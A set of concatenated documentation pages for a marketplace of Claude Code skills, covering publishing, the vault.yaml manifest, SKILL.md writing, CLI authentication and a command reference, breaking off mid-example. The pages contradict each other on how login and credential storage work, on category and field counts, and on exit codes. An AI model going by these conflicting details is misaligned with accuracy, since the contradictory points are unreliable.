Buyers look at creator profiles when deciding whether to trust a product. ## Related pages - [Publishing Your First Product](/docs/creators/publishing) — publish in 5 minutes - [vault.yaml Specification](/docs/creators/vault-yaml) — the product manifest reference - [Monetization Guide](/docs/creators/monetization) — pricing strategies and Stripe details --- # Publishing Your First Product Publish your first MyClaude product in under 5 minutes with `myclaude init` and `myclaude publish`. Creators keep 92% of every sale — the highest revenue share of any AI tool marketplace. Free products have zero fees. MyClaude is the only Claude Code marketplace where you can sell skills, agents, squads, and workflows with real payments via Stripe Connect. Every product is security-scanned with 22 malicious pattern detectors before listing. This tutorial takes you from zero to a live product listing — scaffold, edit, publish. ## Prerequisites Before publishing you need: - A MyClaude creator account — [Create one here](/register) or follow [Creator Onboarding](/docs/creators/onboarding) - The CLI installed and authenticated — `npm install -g @myclaude-cli/cli` then `myclaude login` - A Stripe account connected if you want a paid product — free products skip this Check you are authenticated: ```bash $ myclaude whoami # Logged in as @your-username ``` If you see an error, run `myclaude login` first. ## Step 1 — Scaffold with myclaude init Pick a directory name for your product. Convention is lowercase with hyphens. ```bash $ myclaude init my-first-skill $ cd my-first-skill ``` `myclaude init` creates this structure: ``` my-first-skill/ SKILL.md # Your product content vault.yaml # Your product manifest ``` Two files. That is the entire structure for a Skill. Other categories add files — see [Product Categories](/docs/creators/categories) — but vault.yaml is always required. ## Step 2 — Edit vault.yaml Open `vault.yaml`. The scaffolded file looks like this: ```yaml name: my-first-skill version: "1.0.0" category: skill description: "A short description of what this skill does." author: your-username license: MIT price: 0 ``` Edit the fields to describe your product accurately: ```yaml name: my-first-skill version: "1.0.0" category: skill description: "Does X, enabling Y. Invoke with /my-first-skill." author: your-username license: MIT price: 0 tags: [productivity, workflow] ``` Keep `description` under 160 characters — it appears in search results. See [vault.yaml Specification](/docs/creators/vault-yaml) for every available field. ## Step 3 — Edit your product files Open `SKILL.md`. This is the content file Claude Code receives when a buyer installs your product. Write it as if you are giving Claude a detailed briefing on a new capability. A minimal SKILL.md has three sections: ```markdown ## When to use this skill [One sentence: what triggers this skill.] ## When NOT to use this skill [One sentence: clear exclusion criteria.] ## Instructions [The actual prompt logic, examples, and behavioral rules.] ``` See [Writing Skills Guide](/docs/creators/writing-skills) for a full walkthrough of what makes a skill effective. For other product types, see [Product Categories](/docs/creators/categories). ## Step 4 — myclaude publish From inside your product directory: ```bash $ myclaude publish ``` The CLI runs a pre-publish checklist: 1. Validates `vault.yaml` structure and required fields 2. Scans content for policy violations 3. Checks you are authenticated 4. Uploads files to MyClaude storage 5. Creates the marketplace listing A successful publish looks like: ``` Validating vault.yaml... OK Scanning content... OK Uploading files... OK Creating listing... OK Published: myclaude.sh/p/your-username-my-first-skill ``` If validation fails, the CLI prints the specific field or rule that failed. Fix it and re-run `myclaude publish`. ## Step 5 — Verify on marketplace Open the URL printed by the CLI. Your product page shows: - Name, description, and category - Price (free or paid) - Install command for buyers - Your creator profile link Check that the description renders correctly, the category badge is right, and the price is what you intended. If anything looks wrong, edit `vault.yaml` locally and run `myclaude publish` again — publish is idempotent, it updates the existing listing. ## What happens next Your product is now discoverable at [myclaude.sh/explore](/explore) and via `myclaude search`. Buyers can install it immediately. ```bash # What buyers run to install your product $ myclaude install @your-username/my-first-skill ``` When a buyer installs your product, the files land in their `.claude/skills/` directory (for skills) and are active in their next Claude Code session. ## Common errors | Error | Fix | |-------|-----| | `vault.yaml: missing required field 'description'` | Add a description field | | `Authentication required` | Run `myclaude login` | | `Content policy violation: [reason]` | Remove the flagged content and re-publish | | `Name already taken` | Choose a different `name` in vault.yaml | ## Related pages - [vault.yaml Specification](/docs/creators/vault-yaml) — every field, type, and default - [Writing Skills Guide](/docs/creators/writing-skills) — how to write effective SKILL.md content - [Product Categories](/docs/creators/categories) — file structures for all 9 categories --- # vault.yaml Specification `vault.yaml` is a 9-15 line YAML manifest that defines metadata, pricing, and configuration for any MyClaude product. Every product published to MyClaude requires a `vault.yaml` file in its root directory. It is the authoritative source of truth for your product's identity, category, and pricing. Think of it as `package.json` — but for Claude Code products. ## What is vault.yaml? When you run `myclaude publish`, the CLI reads `vault.yaml` first. Every field is validated against the JSON Schema at [`/specs/vault-yaml.schema.json`](/specs/vault-yaml.schema.json) before anything is uploaded. Invalid files are rejected with a descriptive error message before any upload happens. `vault.yaml` serves three roles simultaneously: - **Marketplace listing** — name, description, category, and tags power the search index and product page - **Install configuration** — tells the CLI where to place files in the buyer's environment - **Commerce contract** — price and license define the terms of every transaction ## Minimal example The minimum valid `vault.yaml` has 9 fields. Every other field is optional. ```yaml name: my-review-skill version: "1.0.0" category: skill description: "Performs systematic code review with security, performance, and style analysis." author: your-username license: MIT price: 0 ``` That is a valid, publishable product. Add optional fields only when they add real value. ## Complete field reference | Field | Type | Required | Description | Default | |-------|------|----------|-------------|---------| | `name` | string | Yes | URL-safe product identifier. Lowercase, hyphens only. Must be unique within your namespace. | — | | `version` | string | Yes | SemVer string (e.g., `"1.0.0"`). Quoted to prevent YAML from stripping trailing zeros. | — | | `category` | enum | Yes | Product category. One of: `skill`, `squad`, `agent`, `workflow`, `design-system`, `prompt`, `claude-md`, `application` | — | | `description` | string | Yes | One-sentence product description. Appears in search results and product cards. Max 160 characters. | — | | `author` | string | Yes | Your MyClaude username. Must match your authenticated account. | — | | `license` | string | Yes | SPDX license identifier. Common values: `MIT`, `Apache-2.0`, `GPL-3.0`, `proprietary` | — | | `price` | number | Yes | Sale price in USD. Use `0` for free products. Minimum paid price: `1.00`. No maximum. | — | | `tags` | string[] | No | Up to 5 tags for search and filtering. Lowercase strings only. | `[]` | | `entry` | string | No | Primary entry file path relative to product root. Overrides category defaults. | Category default | | `install_path` | string | No | Target directory in buyer's environment. Overrides category defaults. | Category default | | `min_cli_version` | string | No | Minimum CLI version required to install. SemVer. Example: `"1.2.0"` | `"1.0.0"` | | `config` | object | No | Arbitrary key-value pairs passed to the product at install time. | `{}` | ### Field constraints **`name`** — Must match `^[a-z0-9][a-z0-9-]{0,62}[a-z0-9]$`. Names beginning with a digit are allowed. Hyphens at start/end are not. The full product handle on the marketplace is `@author/name`. **`version`** — Must be a valid SemVer string. Always quote it in YAML to prevent `1.0` from becoming `1` after parsing. The CLI enforces monotonically increasing versions — you cannot re-publish a lower version. **`category`** — Must be one of the 8 exact enum values. The category determines default `entry` and `install_path` values and controls which file structure validations run. See the examples below. **`price`** — Stored as a float. The CLI rejects values between `0.01` and `0.99` — the minimum paid price is `$1.00`. Values above `0` require Stripe Connect to be configured on your account. **`license`** — The `proprietary` value signals buyers that the product has no open source redistribution rights. All other values must be valid SPDX identifiers. **`tags`** — Maximum 5 tags. Tags longer than 30 characters are rejected. Each tag should be a single concept: `security`, `code-review`, `typescript` — not `for-typescript-projects`. ## Examples by product type ### Skill ```yaml name: aegis-security-audit version: "2.1.0" category: skill description: "Performs comprehensive security audits covering OWASP Top 10, auth flows, and dependency vulnerabilities." author: kairo license: MIT price: 19.00 tags: [security, audit, owasp, vulnerability] ``` Default entry: `SKILL.md` Default install path: `.claude/skills/` ### Squad ```yaml name: copy-squad version: "1.0.0" category: squad description: "15-agent content team: strategist, copywriters, editor, SEO specialist, and brand voice guardian." author: content-labs license: proprietary price: 49.00 tags: [content, copywriting, seo, team] config: max_agents: 15 coordination: sequential ``` Default entry: `SQUAD.md` Default install path: `.claude/squads/` ### Agent ```yaml name: typescript-reviewer version: "1.3.0" category: agent description: "Single-purpose TypeScript code reviewer with strict mode analysis and type safety enforcement." author: devtools license: MIT price: 9.00 tags: [typescript, code-review, static-analysis] entry: AGENT.md ``` Default entry: `AGENT.md` Default install path: `.claude/agents/` ### Workflow ```yaml name: ci-deploy-pipeline version: "1.0.0" category: workflow description: "Automated CI/CD workflow: test, build, security scan, deploy, and notify — wired for GitHub Actions." author: platform-team license: Apache-2.0 price: 0 tags: [ci-cd, deployment, automation, github-actions] min_cli_version: "1.2.0" ``` Default entry: `WORKFLOW.md` Default install path: `.claude/workflows/` ### Design System ```yaml name: terminal-dark-ds version: "3.0.0" category: design-system description: "Dark terminal design system: warm terracotta palette, Minor Third type scale, 5-level surface hierarchy." author: vault-design license: MIT price: 29.00 tags: [design-system, dark-mode, tailwind, tokens] entry: DESIGN-SYSTEM.md ``` ### Prompt ```yaml name: legal-contract-analyzer version: "1.0.0" category: prompt description: "Analyzes legal contracts for risk clauses, unusual terms, and missing standard provisions." author: legal-tools license: proprietary price: 14.00 tags: [legal, contracts, risk-analysis] ``` ### CLAUDE.md ```yaml name: enterprise-compliance-config version: "2.0.0" category: claude-md description: "Enterprise Claude Code configuration: data privacy rules, output formatting, and compliance guardrails." author: enterprise-tools license: proprietary price: 0 tags: [enterprise, compliance, configuration] ``` ### Application ```yaml name: api-scaffolder version: "1.1.0" category: application description: "Generates a complete REST API scaffold with auth, rate limiting, and OpenAPI spec from a data model." author: scaffold-labs license: MIT price: 39.00 tags: [api, scaffold, rest, openapi] entry: APP.md min_cli_version: "1.3.0" ``` ## Validation Run `myclaude validate` at any time to check your `vault.yaml` without publishing: ```bash $ myclaude validate # Validating vault.yaml... # OK — all fields valid ``` The same validation runs automatically during `myclaude publish`. Errors include the field name and the constraint that failed: ``` Error: vault.yaml validation failed - price: value 0.50 is below minimum paid price of 1.00 - tags: maximum 5 tags, found 7 - description: 178 characters exceeds maximum of 160 ``` The full JSON Schema is at [`/specs/vault-yaml.schema.json`](/specs/vault-yaml.schema.json). Use it for editor autocomplete or CI validation. ## Common mistakes | Mistake | Symptom | Fix | |---------|---------|-----| | Unquoted version | `version: 1.0` parsed as `1` | Always quote: `version: "1.0.0"` | | Price below minimum | Rejected at publish | Use `0` for free or `>= 1.00` for paid | | Wrong category enum | Field validation error | Use exact lowercase values: `skill`, not `Skill` | | Author mismatch | Auth error at publish | `author` must match your logged-in username | | Description too long | Field validation error | Keep description under 160 characters | | Tabs instead of spaces | YAML parse error | YAML requires spaces. Configure your editor to use spaces | | Missing quotes on strings with colons | YAML parse error | Quote any string containing `:` | ## Related pages - [Publishing Your First Product](/docs/creators/publishing) — step-by-step publish tutorial - [Product Categories](/docs/creators/categories) — category-specific file structures and requirements - [Quickstart](/docs/getting-started/quickstart) — the fastest path to a live product --- # Writing Skills Guide Build a Claude Code skill in 3 minutes. Create a `SKILL.md` file, define a `vault.yaml` manifest, and publish. Let's build your first skill. Not a toy example — a real, useful skill that people will actually install. By the end you will understand what makes a skill effective, how Claude Code uses SKILL.md files, and how to publish it to the marketplace. ## What is a skill? A skill is a prompt file stored in `.claude/skills/`. When a buyer runs `myclaude install @creator/your-skill`, that file lands in their Claude Code environment. From that point forward, they can invoke your skill by typing `/your-skill-name` in any Claude Code session. Claude Code reads the SKILL.md content and follows the instructions inside it. That means your skill is literally prompt engineering — packaged, versioned, and distributed. | Concept | What it means for you | |---------|----------------------| | `SKILL.md` | The file Claude reads — your actual prompt logic | | `vault.yaml` | The manifest — name, price, metadata | | `/skill-name` | How buyers invoke your skill | | `.claude/skills/` | Where it lives on the buyer's machine | The quality of a skill is entirely determined by the quality of SKILL.md. Good skills are specific, opinionated, and give Claude enough context to perform consistently. ## Create your first skill Let's build a code review skill. Concrete, useful, well-defined. ### Scaffold the project ```bash $ myclaude init code-reviewer $ cd code-reviewer ``` You now have two files: `SKILL.md` and `vault.yaml`. Open them both. ### Write SKILL.md This is the important file. Here is a minimal but effective SKILL.md for a code reviewer: ```markdown ## When to use this skill Use when reviewing code for correctness, security vulnerabilities, performance issues, or style compliance. Works on any language. ## When NOT to use this skill Do not use for generating new code. Do not use for general debugging help. ## Instructions You are a systematic code reviewer. When invoked, follow this exact protocol: 1. **Read the full diff or file** before commenting on any line 2. **Security first** — flag any authentication, injection, or data exposure issues before anything else 3. **Performance second** — identify O(n²) patterns, unnecessary re-renders, or database query problems 4. **Style last** — naming, readability, consistency with existing patterns For each issue, output: - Severity: [CRITICAL / HIGH / MEDIUM / LOW] - Location: file:line - Issue: one sentence description - Fix: concrete suggestion or code snippet If no issues are found, output: "No issues found. Code looks good." Do not be verbose. Do not explain what good code looks like in general. Find the actual problems in the actual code. ``` That is a complete, publishable skill. It is specific enough that Claude will produce consistent output, and opinionated enough that buyers know exactly what they are getting. ## SKILL.md anatomy Every SKILL.md should have three sections. All three matter. ### When to use this skill One to three sentences. Tell Claude the exact trigger condition for this skill. Be specific — vague "use this for anything related to X" instructions produce inconsistent behavior. Good: "Use when reviewing a Pull Request diff or a specific file for production readiness." Bad: "Use for code stuff." ### When NOT to use this skill Often as important as the positive case. This section prevents Claude from over-applying the skill to requests that would be better served by something else. Good: "Do not use for generating new code from scratch. Do not use for explaining concepts — invoke /explain instead." Bad: (omitting this section entirely) ### Instructions The main event. Write this as a precise briefing to Claude. Include: - A persona statement if helpful ("You are a senior security engineer...") - The exact steps to follow in order - Output format (structure your output like this...) - Examples when the expected output is non-obvious - Edge cases Claude should handle Longer is not better. 200-400 words of precise instruction outperforms 2,000 words of vague guidance. Every sentence in Instructions should constrain Claude's behavior — if a sentence does not change what Claude does, remove it. ## Adding to vault.yaml Open `vault.yaml` and fill it out: ```yaml name: code-reviewer version: "1.0.0" category: skill description: "Systematic code review: security, performance, and style — in that priority order." author: your-username license: MIT price: 0 tags: [code-review, security, productivity] ``` Keep `description` under 160 characters. It is the first thing buyers read in search results. See [vault.yaml Specification](/docs/creators/vault-yaml) for every available field including pricing, tags, and configuration options. ## Testing locally Before publishing, test your skill in your own Claude Code session: ```bash $ myclaude install --local . ``` This installs the skill from your local directory into your `.claude/skills/` folder without publishing. Open a Claude Code session and invoke it: ``` /code-reviewer ``` Review a few real files. Watch what Claude does. Ask yourself: - Does Claude follow the protocol you defined? - Is the output format consistent across different codebases? - Does the "when NOT to use" section actually prevent misuse? Iterate on SKILL.md until the output is what you would be proud to sell. Then publish. ## Publishing ```bash $ myclaude publish ``` That is it. The CLI validates vault.yaml, scans the content, and creates your marketplace listing. A successful publish prints your product URL: ``` Published: myclaude.sh/p/your-username-code-reviewer ``` Your skill is now installable by anyone: ```bash $ myclaude install @your-username/code-reviewer ``` ## What makes a skill worth paying for Free skills are easy to publish. Paid skills need to earn their price. The difference: - **Specificity** — a generic "code reviewer" competes with anything. A "Django REST Framework security auditor" has a defensible niche. - **Consistency** — the output format is locked down. Buyers know exactly what they get every time. - **Depth** — the instructions encode real expertise. A $15 skill should save buyers at least an hour of work. - **Maintenance** — version it. Fix edge cases. Publish updates. Buyers trust creators who ship improvements. Start free. Get downloads. Learn what users actually do with your skill. Price the v2. ## Related pages - [vault.yaml Specification](/docs/creators/vault-yaml) — complete field reference for your manifest - [Publishing Your First Product](/docs/creators/publishing) — the full publish tutorial - [Product Categories](/docs/creators/categories) — other product types beyond skills --- # CLI Authentication The MyClaude CLI authenticates via Firebase Auth REST API, stores refresh tokens in the OS keychain, and never writes session tokens to disk. This guide covers the full authentication lifecycle: logging in, how tokens are stored and refreshed, non-interactive authentication for CI/CD, session management, and troubleshooting. ## How authentication works The CLI uses Firebase Authentication as its identity layer -- the same system that powers the MyClaude web application. When you run `myclaude login`, the following sequence occurs: 1. The CLI prompts for your email and password (password input is masked). 2. It calls the Firebase Auth REST API to exchange your credentials for a refresh token and a short-lived ID token. 3. The refresh token is stored in your operating system's keychain (macOS Keychain, Windows Credential Manager, or Linux Secret Service). 4. Non-sensitive metadata (your UID, email, username, and the public API key) is written to `~/.myclaude/config.json`. 5. The ID token is held in memory for the duration of the command and then discarded. It is never written to disk. Every subsequent command that requires authentication reads the refresh token from the keychain, exchanges it for a fresh ID token via Firebase's token refresh endpoint, and uses that ID token for API calls. This happens transparently -- you will not see any "refreshing token" messages unless the refresh fails. ## Logging in Run `myclaude login` from any terminal: ```bash $ myclaude login # Email: you@example.com # Password: ******** # Authenticated as @your-username (you@example.com) ``` On success, the CLI prints your username and email, then stores your session. You are now authenticated for all commands that require it. If you have not yet created a MyClaude account, register at [myclaude.sh](https://myclaude.sh) first. The CLI does not support account creation. ### What gets stored | Data | Location | Encrypted | Persistence | |------|----------|-----------|-------------| | Refresh token | OS keychain | Yes (OS-level encryption) | Until logout or expiry | | ID token | In-memory only | N/A | Discarded after each command | | UID, email, username | `~/.myclaude/config.json` | No (non-sensitive) | Until logout | | Firebase API key | `~/.myclaude/config.json` | No (public key) | Until logout | The refresh token is stored under the service name `vault-marketplace` in your OS keychain. On systems where the keychain is unavailable, the CLI falls back to a file at `~/.myclaude/credentials` with `chmod 600` permissions and prints a warning recommending keychain setup. ## Token lifecycle ### Refresh tokens Refresh tokens have a **90-day hard expiry** from the time of issue and a **10-day idle timeout**. If you do not use the CLI for 10 consecutive days, the refresh token expires and you must run `myclaude login` again. During normal use, the refresh token is silently exchanged for a fresh ID token on every command invocation. This exchange also resets the idle timeout, so active CLI users never encounter expiry during regular workflows. ### ID tokens ID tokens are short-lived (1-hour expiry) and exist only in process memory. They are obtained from the refresh token at the start of each CLI invocation and used for all API calls during that invocation. When the command exits, the ID token is gone. This design ensures that even if an attacker gains read access to your filesystem, there is no usable session token on disk to steal. ### Token refresh flow ``` Command invoked -> Read config.json (get API key) -> Read refresh token from keychain -> POST to Firebase token refresh endpoint -> Receive fresh ID token (1h expiry) -> Use ID token for all API calls -> Command exits, ID token discarded ``` If the refresh fails (token expired, revoked, or network error), the CLI clears stored credentials and prompts you to log in again: ```bash $ myclaude search "code review" # Error: session expired. Run myclaude login to re-authenticate. ``` ## Non-interactive authentication for CI/CD In CI/CD environments where interactive login is not possible, use the `--token` flag or the `MYCLAUDE_TOKEN` environment variable to provide a pre-generated API token: ```bash # Using the --token flag $ myclaude login --token eyJhbGciOiJSUzI1NiJ9... # Authenticated as @your-username ``` ```bash # Using the environment variable $ export MYCLAUDE_TOKEN=eyJhbGciOiJSUzI1NiJ9... $ myclaude publish --dry-run # (uses MYCLAUDE_TOKEN for authentication) ``` When `MYCLAUDE_TOKEN` is set, the CLI skips the keychain entirely and uses the provided token directly. This is the recommended approach for CI/CD pipelines. Store the token as a secret in your CI provider (GitHub Actions secrets, GitLab CI variables, etc.) and inject it at runtime. To generate a token for CI/CD use, log in interactively on a trusted machine and extract the refresh token. Scoped tokens with limited permissions are planned for a future release. ### CI/CD example with GitHub Actions ```yaml name: Publish to MyClaude on: push: tags: ["v*"] jobs: publish: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - uses: actions/setup-node@v4 with: node-version: "20" - run: npm install -g @myclaude-cli/cli - run: myclaude publish env: MYCLAUDE_TOKEN: ${{ secrets.MYCLAUDE_TOKEN }} ``` ## Session management ### Check current session ```bash $ myclaude whoami # Logged in as @your-username ``` `myclaude whoami` makes a lightweight API call to verify the stored token is still valid. It returns exit code `0` on success and exit code `2` if no valid session exists. Use this in scripts to gate operations on an authenticated state: ```bash $ myclaude whoami || myclaude login ``` ### Log out ```bash $ myclaude logout # Logged out. Credentials removed. ``` `myclaude logout` deletes the refresh token from the OS keychain and removes `~/.myclaude/config.json`. No network request is made -- the logout is local only. Sessions on other devices are not affected. ### Verify then act A common pattern: verify authentication before running a pipeline. ```bash $ myclaude whoami && myclaude publish ``` If `whoami` returns a non-zero exit code, the shell short-circuits and `publish` does not run. ## Multiple accounts The CLI supports one active session at a time. To switch between accounts, log out and log back in: ```bash $ myclaude logout $ myclaude login # Email: other-account@example.com # Password: ******** # Authenticated as @other-account ``` If you frequently switch between accounts (for example, a personal account and an organization account), consider using shell aliases or environment-specific `MYCLAUDE_TOKEN` values to manage separate credentials. ## Security considerations **Tokens never leave your machine.** The CLI communicates only with Firebase Auth endpoints and the MyClaude API over HTTPS. Your refresh token is never sent to any third-party service. **Keychain encryption.** On macOS, the refresh token is stored in the macOS Keychain, encrypted with your login password. On Windows, it uses Credential Manager. On Linux, it uses the Secret Service API (typically backed by GNOME Keyring or KWallet). **No plaintext passwords.** Your email and password are transmitted to Firebase Auth over HTTPS and are never stored locally. Only the resulting tokens are persisted. **Credential file fallback.** If the OS keychain is unavailable (common in headless servers or containers), the CLI writes the refresh token to `~/.myclaude/credentials` with `chmod 600` and prints a warning. In these environments, prefer `MYCLAUDE_TOKEN` over the file fallback. ## Troubleshooting authentication | Symptom | Cause | Solution | |---------|-------|----------| | `Error: not authenticated. Run myclaude login.` | No stored credentials | Run `myclaude login` | | `Error: session expired.` | Refresh token exceeded 90-day hard expiry or 10-day idle timeout | Run `myclaude login` to create a new session | | `Error: invalid credentials.` | Wrong email or password | Verify your email and password, or reset your password at [myclaude.sh](https://myclaude.sh) | | `Error: keychain access denied.` | OS keychain locked or permissions issue | Unlock your keychain, or check that the CLI has keychain access permissions | | `Warning: keychain unavailable, using file fallback.` | No OS keychain detected (headless/container) | Expected in CI/CD. Use `MYCLAUDE_TOKEN` instead, or accept the file fallback | | `myclaude whoami` shows wrong account | Logged in as a different user | Run `myclaude logout` then `myclaude login` with the correct account | | `Error: network error during authentication.` | Cannot reach Firebase Auth servers | Check internet connectivity and firewall rules. Firebase Auth uses `identitytoolkit.googleapis.com` | | Token works in terminal but fails in CI | `MYCLAUDE_TOKEN` not set or expired | Verify the secret is correctly injected and the token has not expired | ## Related pages - [CLI Installation](/docs/cli/installation) -- install the CLI and run your first login - [CLI Commands Reference](/docs/cli/commands) -- full reference for login, logout, and whoami - [CLI Configuration](/docs/cli/configuration) -- environment variables and config file settings - [CLI Troubleshooting](/docs/cli/troubleshooting) -- broader FAQ covering all CLI issues --- # CLI Commands Reference The MyClaude CLI provides 12 commands for discovering, installing, and publishing products. All commands are invoked via the `myclaude` binary. Commands that communicate with MyClaude servers require an authenticated session established with `myclaude login`. Commands marked **Auth required** return a `401` error if no valid session exists. ## Command index | Command | Auth required | Description | |---------|---------------|-------------| | [`login`](#login) | No | Authenticate with MyClaude | | [`logout`](#logout) | No | Clear stored credentials | | [`whoami`](#whoami) | Yes | Print current authenticated user | | [`search`](#search) | No | Search the marketplace | | [`install`](#install) | Yes | Install a product | | [`uninstall`](#uninstall) | No | Remove an installed product | | [`update`](#update) | Yes | Update installed products | | [`publish`](#publish) | Yes | Publish a product to the marketplace | | [`list`](#list) | No | List installed products | | [`info`](#info) | No | Show details for a marketplace product | | [`init`](#init) | No | Scaffold a new product directory | | [`scan`](#scan) | No | Validate product files before publish | --- ## login **Synopsis** ``` myclaude login [--token ] ``` **Description** Opens the default browser to the MyClaude authentication page. After the user completes sign-in, the CLI receives an auth token and stores it at `~/.myclaude/credentials.json`. All subsequent commands that require authentication read from this file automatically. If a browser cannot be opened, the CLI prints a URL. Open it manually — authentication completes identically. **Flags** | Flag | Type | Required | Default | Description | |------|------|----------|---------|-------------| | `--token` | string | No | — | Provide a pre-generated API token directly, skipping browser flow. Useful in CI/CD environments. | **Examples** Interactive browser flow: ```bash $ myclaude login # Opening browser... # Authenticated as @your-username ``` Non-interactive with a pre-generated token: ```bash $ myclaude login --token eyJhbGciOiJSUzI1NiJ9... # Authenticated as @your-username ``` Verify the session immediately after login: ```bash $ myclaude login && myclaude whoami # Authenticated as @your-username # Logged in as @your-username ``` --- ## logout **Synopsis** ``` myclaude logout ``` **Description** Deletes the stored credentials file at `~/.myclaude/credentials.json`. No network request is made — the logout is local only. Existing sessions on other devices or in other terminals are not affected. After logout, all commands that require authentication return `Error: not authenticated. Run myclaude login.` **Flags** This command has no flags. **Examples** ```bash $ myclaude logout # Logged out. Credentials removed. ``` Confirm the session is cleared: ```bash $ myclaude whoami # Error: not authenticated. Run myclaude login. ``` Log out and immediately back in: ```bash $ myclaude logout && myclaude login ``` --- ## whoami **Synopsis** ``` myclaude whoami ``` **Description** Prints the username of the currently authenticated user. Makes a lightweight request to the MyClaude API to verify the stored token is still valid. Returns a non-zero exit code if the token is absent or expired. **Flags** This command has no flags. **Examples** Check current session: ```bash $ myclaude whoami # Logged in as @kairo ``` Use in a script to gate operations on an authenticated state: ```bash $ myclaude whoami || myclaude login ``` Non-zero exit on missing credentials (useful in CI): ```bash $ myclaude whoami # Error: not authenticated. Run myclaude login. # exit code: 1 ``` --- ## search **Synopsis** ``` myclaude search [query] [--category ] [--limit ] [--sort ] ``` **Description** Searches the MyClaude marketplace. Without flags, returns the top 20 results ranked by relevance to the query string. Results include product handle, star rating, price, and category. `myclaude search` does not require authentication. Unauthenticated users see the same results as authenticated users. **Flags** | Flag | Type | Required | Default | Description | |------|------|----------|---------|-------------| | `--category` | string | No | — | Filter by product category. Accepted values: `skill`, `squad`, `agent`, `workflow`, `design-system`, `prompt`, `claude-md`, `application` | | `--limit` | number | No | `20` | Maximum number of results to return. Range: 1–100. | | `--sort` | string | No | `relevance` | Sort field. Accepted values: `relevance`, `rating`, `downloads`, `price-asc`, `price-desc`, `newest` | **Examples** Basic keyword search: ```bash $ myclaude search "code review" # @kairo/review-skill ★ 4.9 free skills # @dev/pr-checker ★ 4.7 $4.00 skills # @anya/review-workflow ★ 4.5 $9.00 workflows ``` Filter to a specific category: ```bash $ myclaude search --category agent "typescript" # @devtools/typescript-reviewer ★ 4.8 $9.00 agent # @scaffold-labs/ts-scaffold ★ 4.6 $19.00 agent ``` Return top 5 results sorted by rating: ```bash $ myclaude search --sort rating --limit 5 "security" ``` --- ## install **Synopsis** ``` myclaude install <@creator/product> [--version ] [--force] ``` **Description** Downloads and installs a product from the marketplace into the current environment. For free products, installation completes immediately. For paid products, the CLI opens the purchase flow in the default browser. Installation resumes automatically after payment is confirmed. Files are placed in the directory specified by the product's `vault.yaml` `install_path` field. Category defaults: | Category | Install path | |----------|-------------| | `skill` | `.claude/skills//` | | `squad` | `.claude/squads//` | | `agent` | `.claude/agents//` | | `workflow` | `.claude/workflows//` | | `design-system` | `.claude/design-systems//` | | `prompt` | `.claude/prompts//` | | `claude-md` | `.claude/` (merges into CLAUDE.md) | | `application` | `.claude/apps//` | `myclaude install` requires authentication. Attempting to install without a valid session redirects to `myclaude login`. **Flags** | Flag | Type | Required | Default | Description | |------|------|----------|---------|-------------| | `--version` | string | No | `latest` | Install a specific version. Must be a valid SemVer string matching a published version of the product. | | `--force` | boolean | No | `false` | Overwrite existing installation without prompting, even if the same version is already installed. | **Examples** Install the latest version of a free product: ```bash $ myclaude install @kairo/review-skill # Installing @kairo/review-skill... # Resolved: 1.2.0 # Installed to .claude/skills/review-skill/ # Done. ``` Install a specific version: ```bash $ myclaude install @kairo/review-skill --version 1.1.0 # Installing @kairo/review-skill@1.1.0... # Resolved: 1.1.0 # Installed to .claude/skills/review-skill/ # Done. ``` Install a paid product (triggers browser purchase flow): ```bash $ myclaude install @dev/pr-checker # @dev/pr-checker requires purchase ($4.00) # Opening checkout... [browser opens] # Payment confirmed. Downloading... # Installed to .claude/skills/pr-checker/ # Done. ``` --- ## uninstall **Synopsis** ``` myclaude uninstall <@creator/product> [--yes] ``` **Description** Removes an installed product from the local environment. Deletes all files placed by `myclaude install` in the product's install directory. Does not affect marketplace listings or purchase records — reinstalling the product after uninstall does not require repurchasing it. `myclaude uninstall` does not require authentication because it only modifies the local filesystem. **Flags** | Flag | Type | Required | Default | Description | |------|------|----------|---------|-------------| | `--yes` | boolean | No | `false` | Skip the confirmation prompt. Useful in scripts. | **Examples** Interactive uninstall with confirmation prompt: ```bash $ myclaude uninstall @kairo/review-skill # Remove @kairo/review-skill and all its files? [y/N]: y # Uninstalled @kairo/review-skill # Removed: .claude/skills/review-skill/ ``` Skip confirmation in a script: ```bash $ myclaude uninstall @kairo/review-skill --yes # Uninstalled @kairo/review-skill ``` Uninstall and reinstall to reset to a clean state: ```bash $ myclaude uninstall @kairo/review-skill --yes && myclaude install @kairo/review-skill ``` --- ## update **Synopsis** ``` myclaude update [<@creator/product>] [--all] [--dry-run] ``` **Description** Updates one or more installed products to their latest published versions. When called with a specific product handle, updates only that product. When called with `--all`, updates every installed product that has a newer version available. Products that are already at their latest version are skipped silently. If a newer version introduces breaking changes, the CLI prints a warning but proceeds unless `--dry-run` is used. **Flags** | Flag | Type | Required | Default | Description | |------|------|----------|---------|-------------| | `--all` | boolean | No | `false` | Update all installed products that have newer versions available. Mutually exclusive with specifying a product handle. | | `--dry-run` | boolean | No | `false` | Print which products would be updated and to which versions, without making any changes. | **Examples** Update a single product: ```bash $ myclaude update @kairo/review-skill # @kairo/review-skill: 1.2.0 → 1.3.0 # Updated. ``` Preview all available updates without applying them: ```bash $ myclaude update --all --dry-run # @kairo/review-skill 1.2.0 → 1.3.0 # @dev/pr-checker 0.9.1 → 1.0.0 # 2 updates available. Run without --dry-run to apply. ``` Apply all available updates: ```bash $ myclaude update --all # @kairo/review-skill 1.2.0 → 1.3.0 updated # @dev/pr-checker 0.9.1 → 1.0.0 updated # 2 products updated. ``` --- ## publish **Synopsis** ``` myclaude publish [--dry-run] [--tag ] ``` **Description** Publishes the product in the current working directory to the MyClaude marketplace. The CLI reads `vault.yaml` from the current directory, runs validation and content scanning, uploads files to MyClaude storage, and creates or updates the marketplace listing. Publish is idempotent. Running `myclaude publish` on a product that already exists updates the listing. To publish a new version, increment the `version` field in `vault.yaml` before running `myclaude publish` — the CLI enforces monotonically increasing versions and rejects a publish if the version in `vault.yaml` is equal to or lower than the currently published version. The pre-publish pipeline runs in order: 1. Validate `vault.yaml` structure and all required fields 2. Scan product files for content policy violations 3. Verify authentication and that `author` matches the authenticated user 4. Upload files to MyClaude storage 5. Create or update the marketplace listing If any step fails, the pipeline stops and the listing is not created or modified. Errors include the specific field or rule that failed. **Flags** | Flag | Type | Required | Default | Description | |------|------|----------|---------|-------------| | `--dry-run` | boolean | No | `false` | Run all validation and scanning steps without uploading files or modifying the listing. | | `--tag` | string | No | — | Attach a distribution tag to this version (e.g., `beta`, `rc`). Tagged versions are not returned as `latest` by default. | **Examples** Standard publish from inside a product directory: ```bash $ myclaude publish # Validating vault.yaml... OK # Scanning content... OK # Uploading files... OK # Creating listing... OK # # Published: 